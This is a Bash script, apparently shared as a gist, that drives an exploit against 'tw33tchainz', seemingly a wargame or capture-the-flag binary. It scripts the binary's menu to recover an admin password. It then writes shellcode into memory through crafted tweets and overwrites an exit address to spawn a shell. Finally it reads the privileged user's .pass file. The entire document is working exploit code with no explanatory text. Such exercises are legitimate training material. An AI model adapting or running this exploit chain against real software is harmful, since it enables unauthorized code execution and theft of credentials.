Bash driver to exploit tw33tchainz
| input_file="inputs" | |
| debug_file="debug" | |
| # nuke that shit | |
| rm $input_file | |
| rm $debug_file | |
| touch $input_file | |
| touch $debug_file | |
| binary="/levels/project1/tw33tchainz" | |
| shellCode="/tmp/bleached/project1/binsh.hex" | |
| # in bytes "" <- hand quotes | |
| shellCodeSize=$(cat $shellCode | wc -w) | |
| stepsSinceExit=999 | |
| # program state constants | |
| programState=0 | |
| numTweets=0 | |
| WAIT=999 | |
| GET_PASS=1000 | |
| GET_ADMIN=1001 | |
| WRITE_SHELL=1002 | |
| WRITE_EXIT=1003 | |
| writeAddr="0x0804c0c1" | |
| exitAddr="0x0804c038" | |
| writeAddrValues=$(echo $writeAddr | perl -pe "s/..(..)(..)(..)(..)/\4 \3 \2 \1/") | |
| input() { | |
| printf "$1" "$2" >> $input_file | |
| printf "$1" "$2" >> debug | |
| } | |
| tail -f $input_file | $binary | while read output | |
| do | |
| # filter the asni colors and clears | |
| output="$(echo "$output" | sed "s,\x1B\[[0-9;]*[a-zA-Z],,g")" | |
| echo "$output" | |
| case "$programState" in | |
| $GET_PASS) | |
| genpass="$output" | |
| password="$(python decode_pass.py $genpass)" | |
| programState=$GET_ADMIN | |
| ;; | |
| $GET_ADMIN) | |
| if [ "$stepsSinceExit" == "1" ] | |
| then | |
| input "3\n" | |
| input "%s\n" "$password" | |
| programState=$WRITE_SHELL | |
| fi | |
| ;; | |
| $WRITE_SHELL) | |
| # Since we're admin now it's 2 steps away | |
| if [ "$stepsSinceExit" == "2" ] | |
| then | |
| input "1\n" | |
| hexVal=$(cat $shellCode | cut -d' ' -f$(($numTweets+1))) | |
| tweet=$(python get_tweet.py $writeAddr $numTweets $hexVal) | |
| tsize=$(echo $tweet | wc -c) | |
| input "%s\n" "$tweet" | |
| numTweets=$(($numTweets+1)) | |
| if [ ! $numTweets -lt $shellCodeSize ] | |
| then | |
| programState=$WRITE_EXIT | |
| numTweets=0 | |
| fi | |
| fi | |
| ;; | |
| $WRITE_EXIT) | |
| if [ "$stepsSinceExit" == "2" ] | |
| then | |
| input "1\n" | |
| hexVal=$(echo $writeAddrValues | cut -d' ' -f$(($numTweets+1))) | |
| tweet=$(python get_tweet.py $exitAddr $numTweets $hexVal) | |
| input "%s\n" "$tweet" | |
| numTweets=$(($numTweets+1)) | |
| if [ ! $numTweets -lt 4 ] | |
| then | |
| programState=$EXIT | |
| numTweets=0 | |
| fi | |
| fi | |
| ;; | |
| $EXIT) | |
| if [ "$stepsSinceExit" == "2" ] | |
| then | |
| input "5\n" | |
| # wait for the shell to fire up | |
| sleep 1 | |
| input "cat /home/project1_priv/.pass\n" | |
| programState=$WAIT | |
| fi | |
| ;; | |
| *) | |
| #Do nothing | |
| ;; | |
| esac | |
| case "$output" in | |
| "Enter Username:") | |
| input "%s" "$(python -c "print '\x01'*15")" | |
| ;; | |
| "Enter Salt:") | |
| input "%s" "$(python -c "print '\xff'*15")" | |
| ;; | |
| "Generated Password:") | |
| programState=$GET_PASS | |
| input "\n" | |
| ;; | |
| "5: Exit"*) | |
| stepsSinceExit=0 | |
| ;; | |
| *) | |
| #Do nothing | |
| ;; | |
| esac | |
| stepsSinceExit=$(($stepsSinceExit + 1)) | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment